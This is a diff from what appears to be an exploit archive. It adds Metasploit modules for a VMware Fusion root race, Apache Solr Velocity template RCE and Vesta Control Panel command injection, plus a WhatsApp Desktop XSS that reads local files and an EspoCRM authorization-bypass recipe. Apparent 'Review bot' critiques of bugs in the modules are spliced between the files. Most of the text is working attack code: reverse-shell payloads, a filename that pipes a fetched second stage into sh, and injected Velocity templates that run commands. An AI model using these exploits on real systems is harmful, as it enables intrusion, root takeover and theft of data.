'#{link_folder}#{open_usb_service}'" + print_status "Created folder (#{link_folder}) and link" + + print_status 'Starting USB Service (5 sec pause)' + # XXX: The ; used by cmd_exec will interfere with &, so pad it with : + cmd_exec "cd #{link_folder}; '#{link_folder}/#{open_usb_service}' & :" + Rex.sleep 5 # give time for the service to execute our payload + print_status 'Killing service' + cmd_exec "pkill '#{open_usb_service}'" + print_status "Deleting #{root_link_folder}" + rm_rf root_link_folder + end + + def exactly_11_5_3 + # Upload payload executable & chmod + payload_name = "#{base_dir}#{rand_text_alphanumeric(5..10)}" + print_status "Uploading Payload to #{payload_name}" + write_file payload_name, generate_payload_exe + chmod payload_name, 0o755 + #create race with codesign check + root_link_folder = "#{get_home_dir}/#{rand_text_alphanumeric(2..5)}" # 
for cleanup later + link_folder = "#{root_link_folder}/#{rand_text_alphanumeric(2..5)}/#{rand_text_alphanumeric(2..5)}/" + print_status 'Uploading race condition executable.' + race = <<~EOF + #!/bin/sh + while [ "1" = "1" ]; do + ln -f '/Applications/VMware Fusion.app/Contents/Library/services/#{usb_service}' '#{base_dir}#{usb_service}' + ln -f '#{payload_name}' '#{base_dir}#{usb_service}' + done + EOF + racer_name = "#{base_dir}#{rand_text_alphanumeric(5..10)}" + upload_and_chmodx racer_name, race + register_file_for_cleanup racer_name + register_dirs_for_cleanup root_link_folder + # create the hard link + print_status "Creating folder (#{link_folder}) and link" + cmd_exec "mkdir -p #{link_folder}" + cmd_exec "ln '/Applications/VMware Fusion.app/Contents/Library/services/#{open_usb_service}' '#{link_folder}#{open_usb_service}'" + + # create the launcher to start the racer and keep launching our service to attempt to win + launcher = <<~EOF + #!/bin/sh + #{racer_name} & + for i in {1..#{datastore['MAXATTEMPTS']}} + do + echo "attempt $i"; + '#{link_folder}#{open_usb_service}' + done + EOF + runner_name = "#{base_dir}#{rand_text_alphanumeric(5..10)}" + upload_and_chmodx runner_name, launcher + register_file_for_cleanup runner_name + + print_status "Launching Exploit #{runner_name} (sleeping 15sec)" + # XXX: The ; used by cmd_exec will interfere with &, so pad it with : + results = cmd_exec "#{runner_name} & :" + Rex.sleep 15 # give time for the service to execute our payload + vprint_status results + + print_status 'Exploit Finished, killing scripts.' + kill_process racer_name + kill_process runner_name # in theory should be killed already but just in case + kill_process "'#{link_folder}#{open_usb_service}'" + # kill_process 'ln' a rogue ln -f may mess us up, but killing them seemed to be unreliable and mark the exploit as failed. 
+ # above caused: [-] Exploit failed: Rex::Post::Meterpreter::RequestError stdapi_sys_process_execute: Operation failed: Unknown error + # rm_rf base_dir # this always fails. Leaving it here as a note that when things dont kill well, can't delete the folder + end + + def check + unless exists? "/Applications/VMware Fusion.app/Contents/Library/services/#{open_usb_service}" + print_bad "'#{open_usb_service}' binary missing" + return CheckCode::Safe + end + version = get_version + if version.between?(Gem::Version.new('10.1.3'), Gem::Version.new('11.5.3')) + vprint_good "Vmware Fusion #{version} is exploitable" + else + print_bad "VMware Fusion #{version} is NOT exploitable" + return CheckCode::Safe + end + CheckCode::Appears + end + + def exploit + # First check the system is vulnerable, or the user wants to run regardless + unless check == CheckCode::Appears + unless datastore['ForceExploit'] + fail_with Failure::NotVulnerable, 'Target is not vulnerable. Set ForceExploit to override.' + end + print_warning 'Target does not appear to be vulnerable' + end + + # Check if we're already root + if is_root? + unless datastore['ForceExploit'] + fail_with Failure::BadConfig, 'Session already has root privileges. Set ForceExploit to override' + end + end + + # Make sure we can write our payload to the remote system + rm_rf content_dir # live dangerously. + if directory? content_dir + fail_with Filure::BadConfig, "#{content_dir} exists. Unable to delete automatically. Please delete or exploit will fail." + end + cmd_exec "mkdir -p #{base_dir}" + register_dirs_for_cleanup content_dir + unless writable? base_dir + fail_with Failure::BadConfig, "#{base_dir} is not writable." 
+ end + + version = get_version + if version == Gem::Version.new('11.5.3') + vprint_status 'Using 11.5.3 exploit' + exactly_11_5_3 + elsif version.between?(Gem::Version.new('10.1.3'), Gem::Version.new('11.5.2')) + vprint_status 'Using pre-11.5.3 exploit' + pre_11_5_3 + end + rm_rf content_dir # live dangerously. + end +end \ No newline at end of file diff --git a/exploits/multiple/remote/48338.rb b/exploits/multiple/remote/48338.rb new file mode 100755 index 000000000..f2080902b --- /dev/null +++ b/exploits/multiple/remote/48338.rb 
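Review bot: `fail_with Filure::BadConfig, ...` in `exploit` misspells the `Failure` constant, so the branch meant to report an undeletable `#{content_dir}` raises NameError instead of the intended failure; it should read `fail_with Failure::BadConfig, "#{content_dir} exists. Unable to delete automatically. Please delete or exploit will fail."`. That same block runs `rm_rf content_dir` before it checks whether the directory exists, so a pre-existing `~/Contents` on the session host is removed without any confirmation; the existence check belongs first, and the module should fail rather than delete a directory it did not create. `get_version` only guards against empty `plutil` output: when the regex does not match, `version` stays nil and is passed to `Gem::Version.new`, so the non-matching case should fail with the same BadConfig message, e.g. `fail_with Failure::BadConfig, '...' if version_raw.blank? || version.nil?`. The `Rex.sleep 5` / `Rex.sleep 15` fixed waits in `pre_11_5_3` and `exactly_11_5_3` are undocumented magic numbers and would read better as named constants with a why-comment.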
@@ -0,0 +1,504 @@ +## +# This module requires Metasploit: https://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +require 'msf/core/exploit/powershell' + +class MetasploitModule < Msf::Exploit::Remote + Rank = ExcellentRanking + + include Msf::Exploit::CmdStager + include Msf::Exploit::Powershell + include Msf::Exploit::Remote::HttpClient + + def initialize(info = {}) + super( + update_info( + info, + 'Name' => 'Apache Solr Remote Code Execution via Velocity Template', + 'Description' => %q( + This module exploits a vulnerability in Apache Solr <= 8.3.0 which allows remote code execution via a custom + Velocity template. Currently, this module only supports Solr basic authentication. + + From the Tenable advisory: + An attacker could target a vulnerable Apache Solr instance by first identifying a list + of Solr core names. Once the core names have been identified, an attacker can send a specially crafted + HTTP POST request to the Config API to toggle the params resource loader value for the Velocity Response + Writer in the solrconfig.xml file to true. Enabling this parameter would allow an attacker to use the Velocity + template parameter in a specially crafted Solr request, leading to RCE. + ), + 'License' => MSF_LICENSE, + 'Author' => + [ + 's00py', # Discovery and PoC + 'jas502n', # exploit code on Github + 'AleWong', # ExploitDB contribution, and exploit code on Github + 'Imran E. 
Dawoodjee <imran[at]threathounds.com>' # Metasploit module + ], + 'References' => + [ + [ 'EDB', '47572' ], + [ 'CVE', '2019-17558' ], + [ 'URL', 'https://www.tenable.com/blog/apache-solr-vulnerable-to-remote-code-execution-zero-day-vulnerability'], + [ 'URL', 'https://www.huaweicloud.com/en-us/notice/2018/20191104170849387.html'], + [ 'URL', 'https://gist.github.com/s00py/a1ba36a3689fa13759ff910e179fc133/'], + [ 'URL', 'https://github.com/jas502n/solr_rce'], + [ 'URL', 'https://github.com/AleWong/Apache-Solr-RCE-via-Velocity-template'], + ], + 'Platform' => ['linux', 'unix', 'win'], + 'Targets' => + [ + [ + 'Unix (in-memory)', + { + 'Platform' => 'unix', + 'Arch' => ARCH_CMD, + 'Type' => :unix_memory, + 'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/reverse_bash' } + } + ], + [ + 'Linux (dropper)', + { + 'Platform' => 'linux', + 'Arch' => [ARCH_X86, ARCH_X64], + 'Type' => :linux_dropper, + 'DefaultOptions' => { 'PAYLOAD' => 'linux/x86/meterpreter/reverse_tcp' }, + 'CmdStagerFlavor' => %w[curl wget] + } + ], + [ + 'x86/x64 Windows PowerShell', + { + 'Platform' => 'win', + 'Arch' => [ARCH_X86, ARCH_X64], + 'Type' => :windows_psh, + 'DefaultOptions' => { 'PAYLOAD' => 'windows/meterpreter/reverse_tcp' } + } + ], + [ + 'x86/x64 Windows CmdStager', + { + 'Platform' => 'win', + 'Arch' => [ARCH_X86, ARCH_X64], + 'Type' => :windows_cmdstager, + 'DefaultOptions' => { 'PAYLOAD' => 'windows/meterpreter/reverse_tcp', 'CmdStagerFlavor' => 'vbs' }, + 'CmdStagerFlavor' => %w[vbs certutil] + } + ], + [ + 'Windows Exec', + { + 'Platform' => 'win', + 'Arch' => ARCH_CMD, + 'Type' => :windows_exec, + 'DefaultOptions' => { 'PAYLOAD' => 'cmd/windows/generic' } + } + ], + ], + 'DisclosureDate' => "2019-10-29", # ISO-8601 formatted + 'DefaultTarget' => 0, + 'Privileged' => false + ) + ) + + register_options( + [ + Opt::RPORT(8983), + OptString.new('USERNAME', [false, 'Solr username', 'solr']), + OptString.new('PASSWORD', [false, 'Solr password', 'SolrRocks']), + OptString.new('TARGETURI', 
[false, 'Path to Solr', '/solr/']) + ] + ) + end + + # if we are going to exploit, we only need one core to be exploitable + @vuln_core = "" + # OS specific stuff + @target_platform = "" + # if authentication is used + @auth_string = "" + + def check_auth + # see if authentication is required for the specified Solr instance + auth_check = solr_get('uri' => normalize_uri(target_uri.path)) + + # successfully connected? + unless auth_check + print_bad("Connection failed!") + return nil + end + + # if response code is not 200, then the Solr instance definitely requires authentication + unless auth_check.code == 200 + # if authentication is required and creds are not provided, we cannot reliably check exploitability + if datastore['USERNAME'] == "" && datastore['PASSWORD'] == "" + print_bad("Credentials not provided, skipping credentialed check...") + return nil + end + + # otherwise, try the given creds + auth_string = basic_auth(datastore['USERNAME'], datastore['PASSWORD']) + attempt_auth = solr_get('uri' => normalize_uri(target_uri.path), 'auth' => auth_string) + + # successfully connected? + unless attempt_auth + print_bad("Connection failed!") + return nil + end + # if the return code is not 200, then authentication definitely failed + unless attempt_auth.code == 200 + print_bad("Invalid credentials!") + return nil + end + + store_valid_credential( + user: datastore['USERNAME'], + private: datastore['PASSWORD'], + private_type: :password, + proof: attempt_auth.to_s + ) + + @auth_string = auth_string + end + # a placeholder return value. Not requiring auth should throw no errors + "" + end + + # check for vulnerability existence + def check + auth_res = check_auth + unless auth_res + return CheckCode::Unknown("Authentication failed!") + end + + # send a GET request to get Solr and system details + ver = solr_get('uri' => normalize_uri(target_uri.path, '/admin/info/system'), 'auth' => @auth_string) + + # can't connect? 
that's an automatic failure + unless ver + return CheckCode::Unknown("Connection failed!") + end + + # convert to JSON + ver_json = ver.get_json_document + # get Solr version + solr_version = Gem::Version.new(ver_json['lucene']['solr-spec-version']) + print_status("Found Apache Solr #{solr_version}") + # get OS version details + @target_platform = ver_json['system']['name'] + target_arch = ver_json['system']['arch'] + target_osver = ver_json['system']['version'] + print_status("OS version is #{@target_platform} #{target_arch} #{target_osver}") + # uname doesn't show up for Windows, so run a check for that + if ver_json['system']['uname'] + # print uname only when verbose + vprint_status("Full uname is '#{ver_json['system']['uname'].strip}'") + end + + # the vulnerability is only present in Solr versions <= 8.3.0 + unless solr_version <= Gem::Version.new('8.3.0') + return CheckCode::Safe("Running version of Solr is not vulnerable!") + end + + # enumerate cores + cores = solr_get('uri' => normalize_uri(target_uri.path, '/admin/cores'), 'auth' => @auth_string) + + # can't connect? that's yet another automatic failure + unless cores + return CheckCode::Unknown("Could not enumerate cores!") + end + + # convert to JSON yet again + cores_json = cores.get_json_document + # draw up an array of all the cores + cores_list = Array.new + # get the core names + cores_json['status'].keys.each do |core_name| + cores_list.push(core_name) + end + + # no cores? that means nothing to exploit. + if cores_list.empty? + return CheckCode::Safe("No cores found, nothing to exploit!") + end + + # got cores? tell the operator which cores were found + print_status("Found core(s): #{cores_list.join(', ')}") + possibly_vulnerable_cores = {} + + cores_list.each do |core| + # for each core, attempt to get config + core_config = solr_get('uri' => normalize_uri(target_uri.path, core.to_s, 'config'), 'auth' => @auth_string) + + # can't retrieve configuration for that core? 
go next + unless core_config + print_error("Could not retrieve configuration for core #{core}!") + next + end + + # convert to JSON + core_config_json = core_config.get_json_document + # if the core configuration does not include the Velocity Response Writer, it isn't vulnerable + if core_config_json['config']['queryResponseWriter'].keys.include?("velocity") + vprint_good("Found Velocity Response Writer in use by core #{core}") + if core_config_json['config']['queryResponseWriter']['velocity']['params.resource.loader.enabled'] == "true" + vprint_good("params.resource.loader.enabled for core '#{core}' is set to true.") + possibly_vulnerable_cores.store(core, true) + else + # if params.resource.loader.enabled is false, we need to set it to true before exploitation + print_warning("params.resource.loader.enabled for core #{core} is set to false.") + possibly_vulnerable_cores.store(core, false) + end + else + vprint_error("Velocity Response Writer not found in core #{core}") + next + end + end + + # look at the array of possibly vulnerable cores + if possibly_vulnerable_cores.empty? + CheckCode::Safe("No cores are vulnerable!") + else + # if possible, pick a core that already has params.resource.loader.enabled set to true + possibly_vulnerable_cores.each do |core| + if core[1] == true + @vuln_core = core + break + end + end + # otherwise, just pick the first one + if @vuln_core.to_s == "" + @vuln_core = possibly_vulnerable_cores.first + end + CheckCode::Vulnerable + end + end + + # the exploit method + def exploit + unless [CheckCode::Vulnerable].include? check + fail_with Failure::NotVulnerable, "Target is most likely not vulnerable!" 
+ end + + print_status("Targeting core '#{@vuln_core[0]}'") + + # if params.resource.loader.enabled for that core is false + if @vuln_core[1] != true + # the new config in JSON format + enable_params_resource_loader = { + "update-queryresponsewriter": { + "startup": "lazy", + "name": "velocity", + "class": "solr.VelocityResponseWriter", + "template.base.dir": "", + "solr.resource.loader.enabled": "true", + "params.resource.loader.enabled": "true" + } + }.to_json + + opts_post = { + 'method' => 'POST', + 'connection' => 'Keep-Alive', + 'ctype' => 'application/json;charset=utf-8', + 'encode_params' => false, + 'uri' => normalize_uri(target_uri.path, @vuln_core[0].to_s, 'config'), + 'data' => enable_params_resource_loader + } + + unless @auth_string == "" + opts_post.store('authorization', @auth_string) + end + + print_status("params.resource.loader.enabled is false, setting it to true...") + update_config = send_request_cgi(opts_post) + + unless update_config + fail_with Failure::Unreachable, "Connection failed!" + end + + # if we got anything other than a 200 back, the configuration update failed and the exploit won't work + unless update_config.code == 200 + fail_with Failure::UnexpectedReply, "Unable to update config, exploit failed!" + end + + print_good("params.resource.loader.enabled is now set to true!") + end + + # windows... + if @target_platform.include? "Windows" + # if target is wrong, warn and exit before doing anything + unless target.name.include? "Windows" + fail_with Failure::NoTarget, "Target is found to be Windows, please select the proper target!" + end + + case target['Type'] + # PowerShell... + when :windows_psh + # need PowerShell for this + winenv_path = execute_command("C:\\Windows\\System32\\cmd.exe /c PATH", 'auth_string' => @auth_string, 'core_name' => @vuln_core[0], 'winenv_check' => true) + unless winenv_path + fail_with Failure::Unreachable, "Connection failed!" + end + + # did the command to check for PATH execute? 
+ unless winenv_path.code == 200 + fail_with Failure::UnexpectedReply, "Unexpected reply from target, aborting!" + end + + # is PowerShell in PATH? + if /powershell/i =~ winenv_path.body.to_s + # only interested in the contents of PATH. Everything before it is irrelevant + paths = winenv_path.body.split('=')[1] + # confirm that PowerShell exists in the PATH by checking each one + paths.split(';').each do |path_val| + # if PowerShell exists in PATH, then we are good to go + unless /powershell/i =~ path_val + next + end + + print_good("Found Powershell at #{path_val}") + # generate PowerShell command, encode with base64, and remove comspec + psh_cmd = cmd_psh_payload(payload.encoded, payload_instance.arch.first, encode_final_payload: true, remove_comspec: true) + # specify full path to PowerShell + psh_cmd.insert(0, path_val) + # exploit the thing + execute_command(psh_cmd, 'auth_string' => @auth_string, 'core_name' => @vuln_core[0]) + break + end + else + fail_with Failure::BadConfig, "PowerShell not found!" + end + # ... CmdStager ... + when :windows_cmdstager + print_status("Sending CmdStager payload...") + execute_cmdstager(linemax: 7130, 'auth_string' => @auth_string, 'core_name' => @vuln_core[0]) + # ... or plain old exec? + when :windows_exec + cmd = "C:\\Windows\\System32\\cmd.exe /c #{payload.encoded}" + execute_command(cmd, 'auth_string' => @auth_string, 'core_name' => @vuln_core[0]) + end + end + + # ... or nix-based? + if @target_platform.include? "Linux" + # if target is wrong, warn and exit before doing anything + if target.name.include? "Windows" + fail_with Failure::NoTarget, "Target is found to be nix-based, please select the proper target!" + end + + case target['Type'] + when :linux_dropper + execute_cmdstager('auth_string' => @auth_string, 'core_name' => @vuln_core[0]) + when :unix_memory + cmd = "/bin/bash -c $@|/bin/bash . 
echo #{payload.encoded}" + execute_command(cmd, 'auth_string' => @auth_string, 'core_name' => @vuln_core[0]) + end + end + end + + # some prep work has to be done to work around the limitations of Java's Runtime.exec() + def execute_cmdstager_begin(_opts) + if @target_platform.include? "Windows" + @cmd_list.each do |command| + command.insert(0, "C:\\Windows\\System32\\cmd.exe /c ") + end + else + @cmd_list.each do |command| + command.insert(0, "/bin/bash -c $@|/bin/bash . echo ") + end + end + end + + # sic 'em, bois! + def execute_command(cmd, opts = {}) + # custom template which enables command execution + template = <<~VELOCITY + #set($x="") + #set($rt=$x.class.forName("java.lang.Runtime")) + #set($chr=$x.class.forName("java.lang.Character")) + #set($str=$x.class.forName("java.lang.String")) + VELOCITY + + # attempts to solve the quoting problem, partially successful + if target.name.include?("Unix") + template += <<~VELOCITY + #set($ex=$rt.getRuntime().exec("#{cmd}")) + VELOCITY + else + template += <<~VELOCITY + #set($ex=$rt.getRuntime().exec('#{cmd}')) + VELOCITY + end + + template += <<~VELOCITY + $ex.waitFor() + VELOCITY + + # the next 2 lines cause problems with CmdStager, so it's only used when needed + # during the check for PowerShell existence, or by specific payloads + if opts['winenv_check'] || target['Type'] == :windows_exec || target['Type'] == :unix_memory + template += <<~VELOCITY + #set($out=$ex.getInputStream()) + #if($out.available()) + #foreach($i in [1..$out.available()])$str.valueOf($chr.toChars($out.read()))#end + #else + #end + VELOCITY + end + + # execute the exploit... 
+ raw_result = solr_get( + 'uri' => normalize_uri(target_uri.path, opts['core_name'].to_s, 'select'), + 'auth' => opts['auth_string'], + 'vars_get' => { + 'q' => '1', + 'wt' => 'velocity', + 'v.template' => 'custom', + 'v.template.custom' => template + } + ) + + # Executing PATH always gives a result, so it can return safely + if opts['winenv_check'] + return raw_result + end + + # for printing command output + unless raw_result.nil? + unless raw_result.code == 200 + fail_with Failure::PayloadFailed, "Payload failed to execute!" + end + + # to get pretty output + result_inter = raw_result.body.to_s.sub("0\n", ":::").split(":::").last + unless result_inter.nil? + final_result = result_inter.split("\n").first.strip + print_good(final_result) + end + end + end + + # make sending requests easier + def solr_get(opts = {}) + send_request_cgi_opts = { + 'method' => 'GET', + 'connection' => 'Keep-Alive', + 'uri' => opts['uri'] + } + + # @auth_string defaults to "" if no authentication is necessary + # otherwise, authentication is required + if opts['auth'] != "" + send_request_cgi_opts.store('authorization', opts['auth']) + end + + # a bit unrefined, but should suffice in this case + if opts['vars_get'] + send_request_cgi_opts.store('vars_get', opts['vars_get']) + end + + send_request_cgi(send_request_cgi_opts) + end +end \ No newline at end of file diff --git a/exploits/multiple/webapps/48294.rb b/exploits/multiple/webapps/48294.rb new file mode 100755 index 000000000..53c997d1a --- /dev/null +++ b/exploits/multiple/webapps/48294.rb 
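Review bot: `check` indexes `ver_json['lucene']['solr-spec-version']` and `cores_json['status'].keys` without verifying the shape of the reply, so a non-JSON or unexpected body (an HTML error page, for instance) raises NoMethodError out of `check` instead of returning `CheckCode::Unknown` — if I read `get_json_document` correctly it yields an empty hash on parse failure, which makes the nested lookup the crash point. A guard such as `spec = ver_json.dig('lucene', 'solr-spec-version')` followed by `return CheckCode::Unknown("Unexpected system info response") unless spec` (and the same for `cores_json.dig('status')`) keeps the method's contract. `solr_get` tests `opts['auth'] != ""`, but the first call in `check_auth` passes no `'auth'` key at all, so a nil `'authorization'` entry is stored; `unless opts['auth'].blank?` covers both the nil and empty cases. As a point of style, the `cores_list = Array.new` / `each` / `push` loop is simply `cores_list = cores_json['status'].keys`.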
@@ -0,0 +1,239 @@ +## +# This module requires Metasploit: https://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +class MetasploitModule < Msf::Exploit::Remote + Rank = ExcellentRanking + + include Msf::Exploit::Remote::Ftp + include Msf::Exploit::Remote::HttpClient + include Msf::Exploit::Remote::HttpServer + + def initialize(info={}) + super(update_info(info, + 'Name' => "Vesta Control Panel Authenticated Remote Code Execution", + 'Description' => %q{ + This module exploits command injection vulnerability in v-list-user-backups bash script file. + Low privileged authenticated users can execute arbitrary commands under the context of the root user. + + An authenticated attacker with a low privileges can inject a payload in the file name starts with dot. + During the user backup process, this file name will be evaluated by the v-user-backup bash scripts. As + result of that backup process, when an attacker try to list existing backups injected payload will be + executed. 
+ }, + 'License' => MSF_LICENSE, + 'Author' => + [ + 'Mehmet Ince <mehmet@mehmetince.net>' # author & msf module + ], + 'References' => + [ + ['URL', 'https://pentest.blog/vesta-control-panel-second-order-remote-code-execution-0day-step-by-step-analysis/'], + ['CVE', '2020-10808'] + ], + 'DefaultOptions' => + { + 'SSL' => true, + 'RPORT' => 8083, + 'WfsDelay' => 300, + 'Payload' => 'python/meterpreter/reverse_tcp' + }, + 'Platform' => ['python'], + 'Arch' => ARCH_PYTHON, + 'Targets' => [[ 'Automatic', { }]], + 'Privileged' => false, + 'DisclosureDate' => "Mar 17 2020", + 'DefaultTarget' => 0 + )) + + register_options( + [ + Opt::RPORT(8083), + OptString.new('USERNAME', [true, 'The username to login as']), + OptString.new('PASSWORD', [true, 'The password to login with']), + OptString.new('TARGETURI', [true, 'The URI of the vulnerable instance', '/']) + ] + ) + deregister_options('FTPUSER', 'FTPPASS') + end + + def username + datastore['USERNAME'] + end + + def password + datastore['PASSWORD'] + end + + def login + # + # This is very simple login process. Nothing important. + # We will be using cookie and csrf_token across the module so that we are global variable. + # + print_status('Retrieving cookie and csrf token values') + res = send_request_cgi({ + 'method' => 'GET', + 'uri' => normalize_uri(target_uri.path, 'login', '/'), + }) + + if res && res.code == 200 && !res.get_cookies.empty? + @cookie = res.get_cookies + @csrf_token = res.body.scan(/<input type="hidden" name="token" value="(.*)">/).flatten[0] || '' + if @csrf_token.empty? 
+ fail_with(Failure::Unknown, 'There is no CSRF token at HTTP response.') + end + else + fail_with(Failure::Unknown, 'Something went wrong.') + end + print_good('Cookie and CSRF token values successfully retrieved') + + print_status('Authenticating to HTTP Service with given credentials') + res = send_request_cgi({ + 'method' => 'POST', + 'uri' => normalize_uri(target_uri.path, 'login', '/'), + 'cookie' => @cookie, + 'vars_post' => { + 'token' => @csrf_token, + 'user' => username, + 'password' => password + } + }) + + if res && res.code == 302 && !res.get_cookies.empty? + print_good('Successfully authenticated to the HTTP Service') + @cookie = res.get_cookies + else + fail_with(Failure::Unknown, 'Credentials are not valid.') + end + end + + def is_scheduled_backup_running + res = trigger_scheduled_backup + # + # MORE explaination. + # + if res && res.code == 302 + res = trigger_payload + if res.body.include?('An existing backup is already running. Please wait for that backup to finish.') + return true + else + print_good('It seems scheduled backup is done ..! Triggerring payload <3') + return false + end + else + fail_with(Failure::Unknown, 'Something went wrong. Did you get your session ?') + end + return false + end + + def trigger_payload + res = send_request_cgi({ + 'method' => 'GET', + 'cookie' => @cookie, + 'uri' => normalize_uri(target_uri.path, 'list', 'backup', '/'), + }) + if res && res.code == 200 + res + else + fail_with(Failure::Unknown, 'Something went wrong. Maybe session timed out ?') + end + end + + def trigger_scheduled_backup + res = send_request_cgi({ + 'method' => 'GET', + 'cookie' => @cookie, + 'uri' => normalize_uri(target_uri.path, 'schedule', 'backup', '/'), + }) + if res && res.code == 302 && res.headers['Location'] =~ /\/list\/backup\// + res + else + fail_with(Failure::Unknown, 'Something went wrong.') + end + end + + def payload_implant + # + # Our payload will be placed as a file name on FTP service. 
+ # Payload lenght can't be more then 255 and SPACE can't be used because of the + # bug in the backend software. Due to these limitations, I used web delivery method. + # + # When the initial payload executed. It will execute very short perl command, which is going to fetch + # actual python meterpreter first stager and execute it. + # + final_payload = "curl -sSL #{@second_stage_url} | sh".to_s.unpack("H*").first + p = "perl${IFS}-e${IFS}'system(pack(qq,H#{final_payload.length},,qq,#{final_payload},))'" + + # Yet another datastore variable overriding. + if datastore['SSL'] + ssl_restore = true + datastore['SSL'] = false + end + port_restore = datastore['RPORT'] + datastore['RPORT'] = 21 + datastore['FTPUSER'] = username + datastore['FTPPASS'] = password + + # + # Connecting to the FTP service with same creds as web ui. + # Implanting the very first stage of payload as a empty file. + # + if (not connect_login) + fail_with(Failure::Unknown, 'Unable to authenticate to FTP service') + end + print_good('Successfully authenticated to the FTP service') + + res = send_cmd_data(['PUT', ".a';$(#{p});'"], "") + if res.nil? + fail_with(Failure::UnexpectedReply, "Failed to upload the payload to FTP server") + end + print_good('Successfully uploaded the payload as a file name') + disconnect + + # Revert datastore variables. + datastore['RPORT'] = port_restore + datastore['SSL'] = true if ssl_restore + end + + def exploit + start_http_server + payload_implant + login + trigger_scheduled_backup + print_good('Scheduled backup has ben started. Exploitation may take up to 5 minutes.') + while is_scheduled_backup_running == true + print_status('It seems there is an active backup process ! Recheck after 30 second. Zzzzzz...') + Rex.sleep(30) + end + stop_service + end + + def on_request_uri(cli, request) + print_good('First stage is executed ! 
Sending 2nd stage of the payload') + second_stage = "python -c \"#{payload.encoded}\"" + send_response(cli, second_stage, {'Content-Type'=>'text/html'}) + end + + def start_http_server + # + # HttpClient and HttpServer use same SSL variable :( + # We don't need a SSL for payload delivery. + # + if datastore['SSL'] + ssl_restore = true + datastore['SSL'] = false + end + start_service({'Uri' => { + 'Proc' => Proc.new { |cli, req| + on_request_uri(cli, req) + }, + 'Path' => resource_uri + }}) + print_status("Second payload download URI is #{get_uri}") + # We need that global variable since get_uri keep using SSL from datastore + # We have to get the URI before restoring the SSL. + @second_stage_url = get_uri + datastore['SSL'] = true if ssl_restore + end +end \ No newline at end of file diff --git a/exploits/multiple/webapps/48295.txt b/exploits/multiple/webapps/48295.txt new file mode 100644 index 000000000..7e0e139ae --- /dev/null +++ b/exploits/multiple/webapps/48295.txt 
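Review bot: `is_scheduled_backup_running` calls `trigger_scheduled_backup` at the top of every poll, so each 30-second recheck in `exploit`'s `while` loop schedules another backup on the target instead of only inspecting the backup list; after the single trigger already issued in `exploit`, the poll should call just `trigger_payload` and test its body. The `else fail_with(...)` branch in that method is unreachable, because `trigger_scheduled_backup` already calls `fail_with` for anything other than a 302 with the expected Location. The `# MORE explaination.` comment is a leftover placeholder and should either describe the trigger-then-list sequence the method relies on or be removed. `payload_implant` and `start_http_server` both flip `datastore['SSL']` (and `payload_implant` also `RPORT`) and restore them only at the end of the method, so any `fail_with` in between leaves the datastore altered for the rest of the session; the restore belongs in an `ensure` block.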
@@ -0,0 +1,42 @@ +# Title: WhatsApp Desktop 0.3.9308 - Persistent Cross-Site Scripting +# Date: 2020-01-21 +# Exploit Author: Gal Weizman +# Vendor Homepage: https://www.whatsapp.com +# Software Link: https://web.whatsapp.com/desktop/windows/release/x64/WhatsAppSetup.exe +# Software Link: https://web.whatsapp.com/desktop/mac/files/WhatsApp.dmg +# Version: 0.3.9308 +# Tested On: Mac OS, Windows, iPhone +# CVE: https://nvd.nist.gov/vuln/detail/CVE-2019-18426 + +// step 1: open WhatsApp Web and enter a conversation (Will only work on WhatsApp Web source code as compiled with version 0.3.9308) +// step 2: open devtools and search in all files "t=e.id" +// step 3: after prettifying, set a breakpoint at the line where "t = e.id" can be found +// step 4: paste "https://example.com" in the text box and hit "Enter" +// step 5: when the code stops at the breakpoint, paste the following exploit code in the console and hit "Enter" + +var payload = `(async function() { + alert(navigator.userAgent); + (async function() { + // read "file:///C:/windows/system32/drivers/etc/hosts" content + const r = await fetch(atob('ZmlsZTovLy9DOi93aW5kb3dzL3N5c3RlbTMyL2RyaXZlcnMvZXRjL2hvc3Rz')); + const t = await r.text(); + alert(t); + }()) +}())`; + +payload = `javascript:"https://example.com";eval(atob("${btoa(payload)}"))`; + +e.__x_matchedText = payload; + +e.__x_body = ` + Innocent text + + ${payload} + + More Innocent text +`; + +// step 6: press F8 in order for the execution to continue +// result: a message should be sent to the victim that once is clicked will execute the payload above + +// further information: https://github.com/weizman/CVE-2019-18426 \ No newline at end of file diff --git a/exploits/multiple/webapps/48376.txt b/exploits/multiple/webapps/48376.txt new file mode 100644 index 000000000..af82da422 --- /dev/null +++ b/exploits/multiple/webapps/48376.txt 
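Review bot: The `fetch(atob('ZmlsZTovLy9DOi93aW5kb3dzL3N5c3RlbTMyL2RyaXZlcnMvZXRjL2hvc3Rz'))` step in the payload decodes to `file:///C:/windows/system32/drivers/etc/hosts`, so the local-file-read impact is only demonstrated where the renderer lets a web origin fetch `file://` URLs, which presumably is what separates the Desktop (Electron) client from WhatsApp Web in a normal browser; the header's `Tested On: Mac OS, Windows, iPhone` should therefore be qualified so that readers do not expect the hosts-file read on the non-Windows platforms. I would add a comment above `var payload`, e.g. `// the file:// fetch only succeeds in the Electron desktop client; the javascript: link itself is what was verified elsewhere`. The recipe also depends on the minified identifier `t=e.id` and on `e.__x_matchedText`/`e.__x_body`, which the first step already ties to build 0.3.9308, so this is a manual reproduction guide rather than a runnable exploit and its title should not suggest otherwise.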
@@ -0,0 +1,40 @@
+# Exploit Title: EspoCRM 5.8.5 - Privilege Escalation
+# Author: Besim ALTINOK
+# Vendor Homepage: https://www.espocrm.com
+# Software Link: https://www.espocrm.com/downloads/EspoCRM-5.8.5.zip
+# Version: v5.8.5
+# Tested on: Xampp
+# Credit: İsmail BOZKURT
+
+-------------
+
+Details:
+--------------------------------------------
+
+1- When we sent a request to the /api/v1/App/user, we can see user details
+---
+First Request:
+---------------------------
+GET /api/v1/App/user HTTP/1.1
+Host: localhost
+User-Agent: Mozilla/5.0 *************************
+Authorization: Basic *************************************
+Espo-Authorization: *************************************
+Espo-Authorization-By-Token: true
+X-Requested-With: XMLHttpRequest
+DNT: 1
+Connection: close
+Cookie: auth-token-secret=cdc7f7*********************377;
+auth-username=user1; auth-token=3a874a********************************48
+----
+
+2- When we decode Basic Authorization and Espo-Authorization and change the
+value with another username (like admin) in the first request, we can see
+other user information and access like BOSS
+----------
+
+3- Some Examples and encode technique
+
+- BASE64:
+First type: dXNlcjE6MQ== (user1:1)
+Second type: user1:MzNmYzYwZDQ1ZDI2YWNhODYxZTZlYjdiMDgwMjk4TkRn (user1:pass)
\ No newline at end of file
diff --git a/exploits/php/remote/48335.rb b/exploits/php/remote/48335.rb
